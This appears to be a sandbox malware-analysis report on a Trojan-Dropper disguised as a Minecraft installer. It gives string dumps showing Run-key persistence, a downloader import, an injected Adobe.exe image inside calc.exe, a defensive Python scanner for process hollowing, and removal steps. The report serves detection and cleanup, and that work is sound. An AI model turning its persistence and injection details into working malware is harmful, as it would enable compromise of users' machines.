233353438343
34531433
0323443303233373
83436323
0323443303233363
53432333
13433333
643364336433
5333433323333333
Password missing
\MSINFO32.EXE
Please enter password.
Select Pass from Custom
Invalid password.
Invalid password or Id.
PROVIDER=Microsoft.Jet.OLEDB.4.0;
\Database\Library.mdb;Jet OLEDB:Database Password=Library;
PROVIDER=Microsoft.Jet.OLEDB.4.0;Data Source=
select Dayslimit,Fratepday,Maxhold,Pass,Refcopy,Salnew,Salper,Saltemp,Splashtime,Viewe,Welcometime from Custom
administerpass
2.0.0.0
Encrypter.exe
WindowsApp1
1.0.0.0

Adobe.exe_1464:

.idata
.rdata
P.reloc
P.rsrc
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/5.0 (Windows NT 6.0; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
co.uk
POST / HTTP/1.
HEAD / HTTP/1.
/ HTTP/1.
Content-Type: application/x-www-form-urlencoded
Microsoft\WinNT.tmp
calc.exe
127.0.0.1
encpassword
C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
wsock32.dll
shfolder.dll
shell32.dll
ShellExecuteA
urlmon.dll
URLDownloadToFileA
MPHTTP
KWindows
MPUDP

calc.exe_1072:

.text
`.data
.rsrc
@.reloc
SHELL32.dll
SHLWAPI.dll
gdiplus.dll
ADVAPI32.dll
ntdll.DLL
OLEAUT32.dll
UxTheme.dll
ole32.dll
COMCTL32.dll
KERNEL32.dll
USER32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll
GDI32.dll
msvcrt.dll
j.KXK
FTPWSjr
FtPWSjP
SSShG
.u&SSh
Invalid parameter passed to C runtime function.
WindowsCodecs.dll
ntdll.dll
ShellExecuteExW
GdiplusShutdown
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCloseKey
GetProcessHeap
EnumChildWindows
EnumDesktopWindows
GetKeyState
__crtGetStringTypeW
__crtLCMapStringW
_acmdln
_amsg_exit
calc.pdb
name="Microsoft.Windows.Shell.calc"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
KEYWp
>6441111,5
.Zu,]
>z.jO`
.nsEm
5Url]GOqE
6"%CM
B<$$.HpB
W.Ft6#
9 9(9-949@9
5(5.575=5
99x9
; ;%; ;1;
<%<*<0<6<
5%5S5
^[\ \-]?{\d*}\%c?{\d*}(e[\ \-]?{\d*})?\b*$
USER32.DLL
hXXp://VVV.microsoft.com/applets/calc/templates/v1
xmlns:calcTemplate='hXXp://VVV.microsoft.com/applets/calc/templates/v1'
\StringFileInfo\xx\OriginalFilename
\sppsvc.exe
\slui.exe
\sppuinotify.dll
imageres.dll
datetime_operation
Software\Microsoft\Windows\CurrentVersion\Applets\
mshelp://windows/?id=f15f7d3e-ee9c-465a-a7e8-4e6af5cfee5d
ErrorCode: %d, Line: %d Column: %d; Error: %s
^{[\ \-]?}{\d*\%c?\d*}({e}[\ \-]?{\d*})?$
kernel32.dll
Microsoft-Windows-Calculator/Diagnostic
Microsoft-Windows-Calculator/Debug
Windows Calculator
6.1.7601.17514 (win7sp1_rtm.101119-1850)
CALC.EXE
Windows
Operating System
6.1.7601.17514

calc.exe_1072_rwx_00400000_00011000:

The 85 strings extracted from this region are identical to those listed for Adobe.exe_1464 above (the section names .idata, .rdata, .reloc and .rsrc, the Run key path, the Windows version table, the User-Agent list, MPHTTP, MPUDP, KWindows and the Adobe.exe and WinNT.tmp paths). The RWX region at 0x00400000 in calc.exe:1072 therefore holds a copy of the Adobe.exe image, not Windows Calculator code.
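A dump label like calc.exe_1072_rwx_00400000_00011000 is the kind of artefact a memory scanner keys on. As an added example (my code, not the report's), the script below encodes the two checks that matter: whether the memory holding the main image base is still a MEM_IMAGE mapping, and whether it is writable and executable. The region lists are constructed to mirror the report's calc.exe and a clean process; collect_regions() is a Windows-only live collector built on VirtualQueryEx and ReadProcessMemory, and the image base it needs (from the module list or the PEB) is taken as an argument rather than resolved by the example.

```python
import sys
from dataclasses import dataclass

# Win32 memory constants from winnt.h
MEM_COMMIT, MEM_PRIVATE, MEM_IMAGE = 0x1000, 0x20000, 0x1000000
PAGE_READONLY, PAGE_READWRITE, PAGE_EXECUTE_READ = 0x02, 0x04, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80


@dataclass
class Region:
    base: int
    size: int
    protect: int
    type: int
    state: int = MEM_COMMIT
    head: bytes = b""          # first bytes of the region, when readable


def scan(regions, image_base):
    """Reasons a process looks hollowed or injected. image_base is the main module
    base (PEB.ImageBaseAddress or the first module-list entry); in a clean process
    it lies inside a MEM_IMAGE mapping that is never writable+executable."""
    findings = []
    for r in regions:
        if r.state != MEM_COMMIT:
            continue
        holds_base = r.base <= image_base < r.base + r.size
        wx = r.protect in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
        if holds_base and r.type != MEM_IMAGE:
            findings.append(f"{r.base:#010x}: image base sits in non-image memory (type={r.type:#x}); "
                            "the original mapping was unmapped and replaced")
        if holds_base and wx:
            findings.append(f"{r.base:#010x}: main image region is writable+executable (protect={r.protect:#x})")
        if not holds_base and wx and r.type == MEM_PRIVATE and r.head.startswith(b"MZ"):
            findings.append(f"{r.base:#010x}: private RWX region containing a PE header (manually mapped code)")
    return findings


# Constructed region maps (not sandbox output). HOLLOWED_CALC mirrors the dump label
# calc.exe_1072_rwx_00400000_00011000: 0x11000 RWX bytes at 0x00400000 holding Adobe.exe.
HOLLOWED_CALC = [
    Region(0x00400000, 0x11000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, head=b"MZ\x90\x00"),
    Region(0x00180000, 0x10000, PAGE_READWRITE, MEM_PRIVATE),                        # heap
    Region(0x75A00000, 0x40000, PAGE_EXECUTE_READ, MEM_IMAGE, head=b"MZ\x90\x00"),   # a system DLL
]
CLEAN_CALC = [
    Region(0x00400000, 0x01000, PAGE_READONLY, MEM_IMAGE, head=b"MZ\x90\x00"),   # PE headers
    Region(0x00401000, 0x80000, PAGE_EXECUTE_READ, MEM_IMAGE),                  # .text
    Region(0x00481000, 0x08000, PAGE_READWRITE, MEM_IMAGE),                     # .data
    Region(0x00180000, 0x10000, PAGE_READWRITE, MEM_PRIVATE),                   # heap
]


def collect_regions(pid, head_len=4):
    """Live equivalent of the lists above (Windows only): walk the target with
    VirtualQueryEx and read the first bytes of every committed region. Needs
    PROCESS_QUERY_INFORMATION | PROCESS_VM_READ on the target."""
    import ctypes
    from ctypes import wintypes as wt

    class MBI(ctypes.Structure):   # MEMORY_BASIC_INFORMATION; ctypes padding covers PartitionId on x64
        _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wt.DWORD), ("RegionSize", ctypes.c_size_t),
                    ("State", wt.DWORD), ("Protect", wt.DWORD), ("Type", wt.DWORD)]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.argtypes, k32.OpenProcess.restype = [wt.DWORD, wt.BOOL, wt.DWORD], wt.HANDLE
    k32.VirtualQueryEx.argtypes = [wt.HANDLE, ctypes.c_void_p, ctypes.POINTER(MBI), ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.ReadProcessMemory.argtypes = [wt.HANDLE, ctypes.c_void_p, ctypes.c_char_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    handle = k32.OpenProcess(0x0400 | 0x0010, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    regions, address, mbi = [], 0, MBI()
    try:
        while k32.VirtualQueryEx(handle, address, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base, head = mbi.BaseAddress or 0, b""
            if mbi.State == MEM_COMMIT:
                buf, got = ctypes.create_string_buffer(head_len), ctypes.c_size_t(0)
                if k32.ReadProcessMemory(handle, base, buf, head_len, ctypes.byref(got)):
                    head = buf.raw[:got.value]
            regions.append(Region(base, mbi.RegionSize, mbi.Protect, mbi.Type, mbi.State, head))
            address = base + mbi.RegionSize
    finally:
        k32.CloseHandle(handle)
    return regions


if __name__ == "__main__":
    if sys.platform == "win32" and len(sys.argv) == 3:      # usage: script.py <pid> <image base, hex>
        regions, image_base = collect_regions(int(sys.argv[1])), int(sys.argv[2], 16)
    else:
        regions, image_base = HOLLOWED_CALC, 0x00400000
    for line in scan(regions, image_base) or ["no injection indicators"]:
        print(line)
```

The MEM_IMAGE check is the stronger of the two: JIT runtimes and some packers legitimately keep RWX regions, but a main image that is no longer a section-backed mapping has been unmapped and rewritten, which is what hollowing does. The third rule, a private RWX region with an MZ header away from the image base, catches the manual-mapping variant of injection rather than hollowing.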


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager); the PIDs below are from the sandbox run and differ on every machine, so match on image name:

    %original file name%.exe:3308
    Fuck.exe:2740
    Adobe.exe:1464
    Adobe.exe:4032
    Adobe.exe:2220
    Minecraft PremiumV2.4.exe:308
    RoamingJava.exe:2944
    calc.exe:1072 (the Calculator process hosting the injected Adobe.exe code; it is absent from the sandbox's own process list above, and a live instance is told apart from a genuine Calculator by the writable-and-executable region at 0x00400000 shown in the strings section)

  2. Delete the original Trojan-Dropper file.
  3. Delete or disinfect the following files created/modified by the Trojan-Dropper:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\dnserrordiagoff_webOC[1] (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe (148 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp (36 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe (72 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry); do this only after step 1, because each Adobe.exe instance wrote this value when it started:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
